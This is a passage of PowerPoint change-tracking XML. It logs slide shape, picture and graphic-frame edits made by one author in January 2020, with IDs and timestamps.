          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T17:11:50.123" v="2864" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3066096953" sldId="267"/>
            <ac:spMk id="2" creationId="{CFB85931-F905-9A47-89CB-FFB16410049C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T17:07:53.647" v="2762" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3066096953" sldId="267"/>
            <ac:spMk id="3" creationId="{41358C87-C1A5-9742-8E57-F83EBB00F4EC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T17:07:59.299" v="2764" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3066096953" sldId="267"/>
            <ac:spMk id="10" creationId="{138A1F75-A706-0C4F-A04A-40DB16CCC16A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T17:11:45.143" v="2863" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3066096953" sldId="267"/>
            <ac:spMk id="14" creationId="{E9BA134F-37B6-498A-B46D-040B86E5DA35}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T17:11:45.143" v="2863" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3066096953" sldId="267"/>
            <ac:spMk id="15" creationId="{EF4EB4FC-A0AF-8B41-AC11-069AAB813D86}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T17:11:45.143" v="2863" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3066096953" sldId="267"/>
            <ac:spMk id="16" creationId="{2BFE3F30-11E0-4842-8523-7222538C8293}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T17:11:45.143" v="2863" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3066096953" sldId="267"/>
            <ac:spMk id="25" creationId="{103E59AE-44F8-4FB9-BF05-C888FE3E1DFA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T17:11:45.143" v="2863" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3066096953" sldId="267"/>
            <ac:spMk id="29" creationId="{8B6B14AE-589A-45CC-A30D-41995FC1F8BA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:grpChg chg="del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T16:55:51.120" v="2582" actId="478"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3066096953" sldId="267"/>
            <ac:grpSpMk id="9" creationId="{E85BB25E-96AF-CE4D-BE72-C2963F63F4FD}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:graphicFrameChg chg="add mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T17:21:34.748" v="2924"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3066096953" sldId="267"/>
            <ac:graphicFrameMk id="20" creationId="{F0E7D431-662C-45F5-8EB0-C5691AFEC6D7}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
        <pc:cxnChg chg="del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T17:11:45.143" v="2863" actId="26606"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3066096953" sldId="267"/>
            <ac:cxnSpMk id="18" creationId="{67E7D319-545A-41CD-95DF-4DE4FA8A46B1}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T17:11:45.143" v="2863" actId="26606"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3066096953" sldId="267"/>
            <ac:cxnSpMk id="27" creationId="{2752F38C-F560-47AA-90AD-209F39C04150}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add modNotesTx">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T18:27:57.399" v="10526" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2570005949" sldId="270"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-07T16:51:04.828" v="8949" actId="113"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2570005949" sldId="270"/>
            <ac:spMk id="7" creationId="{F52B68D8-8289-374C-A736-73DDC9D1F36F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T17:49:29.322" v="4636" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2570005949" sldId="270"/>
            <ac:spMk id="8" creationId="{4C8DD45A-2B58-0A40-A336-6A0EAE19C4FF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T17:21:49.992" v="2927" actId="207"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2570005949" sldId="270"/>
            <ac:graphicFrameMk id="20" creationId="{F0E7D431-662C-45F5-8EB0-C5691AFEC6D7}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add ord modNotesTx">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T18:28:11.944" v="10617" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3919541702" sldId="271"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T17:34:18.747" v="4224" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3919541702" sldId="271"/>
            <ac:spMk id="3" creationId="{551BD701-AC89-D044-B477-CA697A1B7096}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T17:34:18.747" v="4224" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3919541702" sldId="271"/>
            <ac:spMk id="4" creationId="{478B9D98-401E-9943-AD8C-8CC646AE690A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-07T16:51:15.660" v="8950" actId="113"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3919541702" sldId="271"/>
            <ac:spMk id="7" creationId="{3204FCD7-28CF-7842-94C1-6A9627BA1090}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T17:32:10.052" v="4048"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3919541702" sldId="271"/>
            <ac:spMk id="10" creationId="{CAD64F34-F4EE-3441-B82E-C3E9CC75C8D0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T21:11:53.453" v="8772" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3919541702" sldId="271"/>
            <ac:spMk id="11" creationId="{DE0AE8A6-BE18-3740-AD34-9013439CCF52}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T21:12:00.215" v="8774" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3919541702" sldId="271"/>
            <ac:spMk id="12" creationId="{B4ADDB1B-5195-0D48-B510-9B2AF048ECF1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T21:12:02.128" v="8775" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3919541702" sldId="271"/>
            <ac:spMk id="13" creationId="{AF70053A-2FEC-B24D-8D3B-6025646BBCE3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T21:11:56.649" v="8773" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3919541702" sldId="271"/>
            <ac:spMk id="14" creationId="{8BA7B086-1977-F845-99F2-92ACC5C02DCB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T17:34:22.728" v="4225" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3919541702" sldId="271"/>
            <ac:spMk id="15" creationId="{AE5F19E8-3CA6-DF42-8A5A-9796E62DE871}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T17:26:28.581" v="3347" actId="207"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3919541702" sldId="271"/>
            <ac:graphicFrameMk id="20" creationId="{F0E7D431-662C-45F5-8EB0-C5691AFEC6D7}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add ord modNotesTx">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T17:50:02.004" v="4652" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="555979675" sldId="272"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T17:50:02.004" v="4652" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="555979675" sldId="272"/>
            <ac:spMk id="7" creationId="{DCFB66BB-A57A-E64F-A156-B9C926422B98}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T17:37:19.828" v="4232" actId="207"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="555979675" sldId="272"/>
            <ac:graphicFrameMk id="20" creationId="{F0E7D431-662C-45F5-8EB0-C5691AFEC6D7}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add ord">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T17:49:55.475" v="9522"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3419498080" sldId="273"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T17:52:39.807" v="4672" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3419498080" sldId="273"/>
            <ac:spMk id="2" creationId="{CFB85931-F905-9A47-89CB-FFB16410049C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T17:49:55.475" v="9522"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3419498080" sldId="273"/>
            <ac:graphicFrameMk id="20" creationId="{F0E7D431-662C-45F5-8EB0-C5691AFEC6D7}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T17:50:53.972" v="9534" actId="207"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="371852309" sldId="274"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T18:16:00.224" v="5068" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="371852309" sldId="274"/>
            <ac:spMk id="9" creationId="{67BFEEC4-803A-9E4A-98DF-ED7AE9C73C0B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T17:50:07.797" v="9526"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="371852309" sldId="274"/>
            <ac:graphicFrameMk id="8" creationId="{CE9B35F4-7982-5D48-8D77-12ECB333A11B}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
        <pc:graphicFrameChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T17:50:28.256" v="9529" actId="478"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="371852309" sldId="274"/>
            <ac:graphicFrameMk id="10" creationId="{31219633-B2F8-9646-BE47-6280A2A0FACF}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
        <pc:graphicFrameChg chg="add mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T17:50:53.972" v="9534" actId="207"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="371852309" sldId="274"/>
            <ac:graphicFrameMk id="11" creationId="{A52CF4BB-F17D-8D4D-8921-8BD614F034D8}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
        <pc:graphicFrameChg chg="del mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T17:50:13.194" v="9527" actId="478"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="371852309" sldId="274"/>
            <ac:graphicFrameMk id="20" creationId="{F0E7D431-662C-45F5-8EB0-C5691AFEC6D7}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T20:18:10.668" v="8400" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="371852309" sldId="274"/>
            <ac:picMk id="4" creationId="{4C2DD1C3-49DF-EC46-9280-116DA464240A}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T17:54:14.890" v="9594" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="362835881" sldId="275"/>
        </pc:sldMkLst>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T17:53:31.699" v="9569" actId="931"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="362835881" sldId="275"/>
            <ac:spMk id="5" creationId="{C4A775D2-996E-7848-9726-49F5D7B93456}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T17:53:04.922" v="9564"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="362835881" sldId="275"/>
            <ac:spMk id="7" creationId="{B2138E32-1E79-2545-B192-DD6384540CF8}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T17:54:14.890" v="9594" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="362835881" sldId="275"/>
            <ac:spMk id="10" creationId="{C41B9C53-E184-C14B-9112-D7A2F06D2B80}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="add mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T17:53:13.757" v="9566"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="362835881" sldId="275"/>
            <ac:graphicFrameMk id="8" creationId="{8F8401C5-AA07-D943-8C2A-102391D93D13}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
        <pc:graphicFrameChg chg="del mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T17:51:51.396" v="9543" actId="478"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="362835881" sldId="275"/>
            <ac:graphicFrameMk id="20" creationId="{F0E7D431-662C-45F5-8EB0-C5691AFEC6D7}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T17:53:05.900" v="9565" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="362835881" sldId="275"/>
            <ac:picMk id="3" creationId="{96B1A5AA-4DD8-3544-A2CE-7FD88AD3E0F4}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T17:53:50.993" v="9573" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="362835881" sldId="275"/>
            <ac:picMk id="9" creationId="{1F81E5D2-F58D-2445-A0F6-6D0DA79D3100}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T18:27:08.196" v="10439" actId="207"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2360740882" sldId="276"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T19:02:04.244" v="7041" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2360740882" sldId="276"/>
            <ac:spMk id="3" creationId="{5A7CA5B4-80CC-C44E-ACAA-6122588012A0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T19:02:04.244" v="7041" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2360740882" sldId="276"/>
            <ac:spMk id="4" creationId="{E0C5C27B-EE6F-E74A-B465-D11F2B5D7F0D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T19:02:04.244" v="7041" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2360740882" sldId="276"/>
            <ac:spMk id="5" creationId="{FD261679-C3F6-064B-BB76-F2E5FBEE2EA6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T19:02:04.244" v="7041" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2360740882" sldId="276"/>
            <ac:spMk id="6" creationId="{5AA4E351-A9E8-B04D-A4E0-223D6F27CE98}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T18:41:37.685" v="6417" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2360740882" sldId="276"/>
            <ac:spMk id="7" creationId="{030E7ED3-BC2B-BE4E-8F40-2B766D479F41}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T18:45:57.574" v="6643"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2360740882" sldId="276"/>
            <ac:spMk id="8" creationId="{30A1FD43-0D64-E441-911F-95B6459E6958}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T18:51:37.745" v="6709"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2360740882" sldId="276"/>
            <ac:spMk id="9" creationId="{B4E5C656-E1C0-434E-BC7D-F34B8D0E465F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T20:36:24.842" v="8441" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2360740882" sldId="276"/>
            <ac:spMk id="10" creationId="{BDFB0114-1999-1243-99E0-54E76A8088D5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T20:36:24.842" v="8441" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2360740882" sldId="276"/>
            <ac:spMk id="11" creationId="{75AF7595-9C03-2845-9E6B-BB1035AAE63A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-02T19:02:04.244" v="7041" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2360740882" sldId="276"/>
            <ac:spMk id="12" creationId="{B4A496BA-5F6C-E643-84B7-D982C01B4B75}"/>
          </ac:spMkLst>
